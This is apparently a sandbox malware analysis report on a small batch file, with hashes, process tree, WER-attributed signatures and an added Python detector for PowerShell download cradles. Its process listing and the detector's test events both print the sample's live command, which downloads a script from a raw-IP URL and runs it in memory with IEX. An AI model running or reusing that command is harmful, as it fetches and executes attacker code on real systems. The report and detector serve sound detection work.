Analysis

Max time kernel: 147s
Max time network: 151s
Platform: windows10_x64
Resource: win10v191014
Submitted: 17-02-2020 15:10

Static task: static1

Behavioral task: behavioral1
  Sample: QtxPGbas.bat
  Resource: win7v200213 (windows7_x64)
  0 signatures, 0 seconds

Behavioral task: behavioral2
  Sample: QtxPGbas.bat
  Resource: win10v191014 (windows10_x64)
  0 signatures, 0 seconds
General

Target: QtxPGbas.bat
Size: 189B
MD5: b896f6ff4553af50764dbf2c947a05bb
SHA1: 530bc65bb8cd23bf06865ddb93164f0c6348f578
SHA256: f9366f629ed77ac92ea0a86a9f063f9a33f6cb37c03b8c094f4d74515b930412
SHA512: 32377669fab2cc36cd228ef46fc33f15d36d4ef2abdd7c3c93b253d8b7a520c697cc67b80c5bd8762d1b6bac18764adb97edeca3a08e7cd24316a84384405a85
Score: 10/10
Malware Config

Extracted
  Language: ps1
  Source URLs:
    ps1.dropper: http://185.103.242.78/pastes/QtxPGbas
Signatures

Note on attribution: every IoC in this section was recorded from WerFault.exe (PID 5012), the Windows Error Reporting handler that was started because powershell.exe (PID 4936) crashed. Reading the BIOS and CentralProcessor registry keys, enumerating processes and enabling SeDebugPrivilege/SeBackupPrivilege/SeRestorePrivilege are part of WER's normal crash-report collection, not actions of the sample. The sample's own observable behaviour is limited to the process chain and the download URL (see Processes below); the fetched PowerShell stage was not captured in this run.

Enumerates system info in registry (2 TTPs, 2 IoCs)
Processes:
  description         ioc                                                            process
  Key opened          \REGISTRY\MACHINE\Hardware\Description\System\BIOS             WerFault.exe
  Key value queried   \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU   WerFault.exe

Program crash (1 IoC)
Processes:
  pid     pid_target   process        target process
  5012    4936         WerFault.exe   powershell.exe

Suspicious use of AdjustPrivilegeToken (3 IoCs)
Processes:
  description                  pid     process
  Token: SeRestorePrivilege    5012    WerFault.exe
  Token: SeBackupPrivilege     5012    WerFault.exe
  Token: SeDebugPrivilege      5012    WerFault.exe

Suspicious behavior: EnumeratesProcesses (18 IoCs)
Processes:
  pid     process
  5012    WerFault.exe (18 identical entries)

Checks processor information in registry (2 TTPs, 3 IoCs)
Processor information is often read in order to detect sandboxing environments. In this report the reads come from WerFault.exe collecting crash telemetry, so they are not evidence of sandbox evasion by the sample.
Processes:
  description         ioc                                                                              process
  Key opened          \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0                 WerFault.exe
  Key value queried   \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz            WerFault.exe
  Key value queried   \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString   WerFault.exe
Processes

C:\Windows\system32\cmd.exe (PID 4892)
  Command line: C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\QtxPGbas.bat"

  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 4936)
    Command line: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/QtxPGbas');Invoke-HGCAMJ;Start-Sleep -s 10000"

    C:\Windows\SysWOW64\WerFault.exe (PID 5012)
      Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 4936 -s 704
      Signatures: Enumerates system info in registry; Program crash; Suspicious use of AdjustPrivilegeToken; Suspicious behavior: EnumeratesProcesses; Checks processor information in registry

\??\c:\windows\system32\taskhostw.exe (PID 4088)
  Command line: taskhostw.exe -RegisterDevice -SettingChange -Full
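The detection-relevant part of this report is the launch chain: cmd.exe runs a batch file from the user's Temp directory, which starts 32-bit PowerShell with an in-memory download cradle (WebClient.DownloadString piped into IEX) against a raw-IP paste URL, calls a function from the fetched script and then sleeps for a long time. The following is an added example written for this page, not sandbox output or the sample's code: it scores process-creation events for exactly these indicators and extracts the URL as an IoC. The event records are constructed from the command lines and PIDs in the report; the field names, the parent PIDs of the two top-level processes and the extra benign PowerShell event are assumptions.

```python
"""Score process-creation events for PowerShell download cradles."""
import re
from dataclasses import dataclass

# Constructed events modelled on the report's process tree. Command lines and
# PIDs 4892/4936/5012/4088 are from the report; the ppid of the top-level
# processes (4000, 1000) and the benign event (pid 6000) are assumptions.
EVENTS = [
    {"pid": 4892, "ppid": 4000, "image": r"C:\Windows\system32\cmd.exe",
     "cmdline": r'C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\QtxPGbas.bat"'},
    {"pid": 4936, "ppid": 4892,
     "image": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r'''C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/QtxPGbas');Invoke-HGCAMJ;Start-Sleep -s 10000"'''},
    {"pid": 5012, "ppid": 4936, "image": r"C:\Windows\SysWOW64\WerFault.exe",
     "cmdline": r"C:\Windows\SysWOW64\WerFault.exe -u -p 4936 -s 704"},
    {"pid": 4088, "ppid": 1000, "image": r"c:\windows\system32\taskhostw.exe",
     "cmdline": "taskhostw.exe -RegisterDevice -SettingChange -Full"},
    {"pid": 6000, "ppid": 1000,  # benign admin use: must not alert
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -File C:\Scripts\backup.ps1"},
]

# Each indicator carries a weight; an event is reported when the sum reaches
# ALERT_THRESHOLD, so a lone IEX or a lone web request does not fire.
PATTERNS = {
    "download_cradle": (re.compile(
        r"(?i)Net\.WebClient|DownloadString|DownloadFile|Invoke-WebRequest|"
        r"\biwr\b|Invoke-RestMethod|\birm\b|Start-BitsTransfer"), 3),
    "in_memory_exec": (re.compile(r"(?i)\b(IEX|Invoke-Expression)\b"), 3),
    "raw_ip_url": (re.compile(r"(?i)https?://\d{1,3}(?:\.\d{1,3}){3}\b"), 2),
    "long_sleep": (re.compile(r"(?i)Start-Sleep\s+-s(?:econds)?\s+\d{4,}"), 1),
    "wow64_powershell": (re.compile(r"(?i)\\SysWOW64\\WindowsPowerShell\\"), 1),
}
ALERT_THRESHOLD = 4
URL_RE = re.compile(r"""(?i)https?://[^\s'"()<>]+""")
POWERSHELL_RE = re.compile(r"(?i)(^|\\)(powershell|pwsh)\.exe$")
# cmd.exe /c <script>.bat|.cmd living under a Temp or Downloads directory
TEMP_SCRIPT_RE = re.compile(r'(?i)\\(Temp|Downloads)\\[^\\"]+\.(bat|cmd)\b')


@dataclass
class Finding:
    pid: int
    score: int
    indicators: list
    urls: list
    parent_cmdline: str


def analyze(events):
    """Return a Finding for every PowerShell event that crosses the threshold."""
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for e in events:
        if not POWERSHELL_RE.search(e["image"]):
            continue
        score, hits = 0, []
        for name, (rx, weight) in PATTERNS.items():
            if rx.search(e["cmdline"]):
                score += weight
                hits.append(name)
        parent = by_pid.get(e["ppid"])
        parent_cmd = parent["cmdline"] if parent else ""
        # Launch chain seen in the report: cmd.exe running a batch file from
        # %TEMP% is the parent of the PowerShell process.
        if parent and parent["image"].lower().endswith("cmd.exe") \
                and TEMP_SCRIPT_RE.search(parent_cmd):
            score += 2
            hits.append("spawned_by_temp_batch")
        if score >= ALERT_THRESHOLD:
            findings.append(Finding(e["pid"], score, hits,
                                    URL_RE.findall(e["cmdline"]), parent_cmd))
    return findings


if __name__ == "__main__":
    for f in analyze(EVENTS):
        print(f"pid {f.pid} score {f.score}: {', '.join(f.indicators)}")
        for url in f.urls:
            print(f"  IoC url: {url}")
        print(f"  parent: {f.parent_cmdline}")
```

Only PID 4936 is reported; WerFault.exe and taskhostw.exe are ignored because they are not PowerShell images, and the benign `-File` invocation scores zero. The weights are a starting point: in an environment where 32-bit PowerShell or raw-IP URLs are routine, lower those two and lean on the cradle-plus-IEX pair, which is the combination that actually matters here.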